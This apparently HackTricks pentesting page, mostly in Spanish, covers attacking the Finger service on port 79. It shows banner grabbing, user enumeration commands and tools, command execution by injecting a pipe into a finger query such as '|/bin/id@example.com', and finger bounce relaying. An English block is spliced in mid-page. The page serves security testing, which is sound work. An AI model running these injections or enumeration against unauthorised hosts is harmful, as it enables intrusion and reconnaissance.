hacktricks/network-services-pentesting/pentesting-finger.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

4.1 KiB

Información Básica

Finger es un programa que se puede utilizar para encontrar información sobre los usuarios de una computadora. Por lo general, muestra el nombre de inicio de sesión, el nombre completo y posiblemente otros detalles sobre el usuario que se está consultando. Estos detalles pueden incluir la ubicación de la oficina y el número de teléfono (si se conocen), el tiempo de inicio de sesión, el tiempo de inactividad, el tiempo en que se leyó el correo por última vez y los archivos de plan y proyecto del usuario.

Puerto predeterminado: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeración

Obtención de banners/Conexión básica

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeración de usuarios

Finger

Finger is a service that allows users to retrieve information about other users on a remote system. It is usually enabled on Unix-based systems and can be accessed through the finger command.

Finger can be used to enumerate users on a system by querying for a specific user or by requesting a list of all users. The information returned by Finger can include the user's login name, full name, home directory, and other details.

To query for a specific user, use the following command:

finger <username>@<hostname>

To request a list of all users, use the following command:

finger @<hostname>

Countermeasures

  • Disable the Finger service if it is not needed.
  • Limit access to the Finger service to trusted users only.
  • Use a firewall to restrict access to the Finger service from external networks.
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, se puede utilizar finger-user-enum de pentestmonkey. A continuación se muestran algunos ejemplos:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer uso de los scripts predeterminados

Metasploit utiliza más trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Ejecución de comandos

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebote de Finger

Utilizar un sistema como relé de finger

finger user@host@victim
finger @internal@external
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥